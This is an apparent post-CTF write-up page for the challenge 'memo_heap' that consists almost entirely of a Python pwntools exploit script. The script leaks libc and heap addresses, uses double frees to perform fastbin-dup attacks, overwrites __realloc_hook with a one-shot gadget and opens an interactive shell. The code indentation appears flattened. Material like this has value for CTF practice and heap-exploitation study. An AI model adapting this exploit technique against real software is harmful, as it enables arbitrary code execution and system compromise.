Tags: fastbindup 

Rating: 0

Exploit by h3rcul35 (post-ctf) :
```
from pwn import *

p=process('memo_heap')
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')

def send(input):
p.sendline(str(input))

def sla(first,second):
p.sendlineafter(str(first),str(second))

def ra(till):
p.recvuntil(till)
return p.recvline()

def choice(num):
sla('choice: ',str(num))

def create(size,name=''):
choice('1')
sla('create? ',str(size))
if name!='':
sla('memo: ',str(name))

def delete(index):
choice('4')
sla('delete: ',str(index))

def show(index):
choice('3')
sla('show: ',str(index))

def edit(index,data=''):
choice('2')
sla('edit: ',str(index))
if data!='':
sla('of memo: ',str(data))

create(256,'A'*8)
create(0)
delete(0)
create(0)
show(0)

recv=ra('Name: ').split('\n')[0]
main_arena=u64(recv+"\x00"*(8-len(recv)))-88
libc_base=main_arena-0x3c2860
one_shot=libc_base+0x4647c
realloc_hook=libc_base+libc.symbols['__realloc_hook']
print "[+] Libc leaked. Base at "+hex(libc_base)
print "[+] Realloc hook address: "+hex(realloc_hook)
print "[+] One shot gadget is at "+hex(one_shot)

delete(1)
delete(0)
create(0)
show(0)

heap_130=u64(ra('Name: ').split('\n')[0]+"\x00"*2)
heap_base=heap_130-0x130
print "[+] Heap leaked. Base at "+hex(heap_base)

create(96,'B'*3)
create(16,'C'*3)
create(0)
edit(0)
delete(2)
delete(0)
print "[+] Double free triggererd for size 16"

#a,b,a in free bin list(0x10). First use create(16,p64(metadata_chunk)) then create(16) twice.
#create(16,p64(malloc_hook)) now will give write access to meta data for 0x70 chunk and corrupt it.
#now edit the chunk of size 0x70 and write one_shot into it. And call realloc (edit)

create(16,p64(heap_base+0x130))
create(16,'D'*3)
create(16,p64(heap_base+0x50)+p32(0)+p32(1))
print "[+] Fast bin dup done for size 16"

delete(0)
delete(2)
delete(3)
create(96,'E'*3)
edit(1)
delete(0)
delete(1)
print "[+] Double free triggered for size 96"

create(96,p64(realloc_hook-0x13)*2)
create(96,'a'*3)
create(96,'b'*3)
pay='\x00'*3+(p64(one_shot)+p64(0))*2
create(96,pay)
print "[+] Fast bin dup done for size 96"
print "[+] Overwrote __realloc_hook with magic gadget"

edit(1)
p.interactive()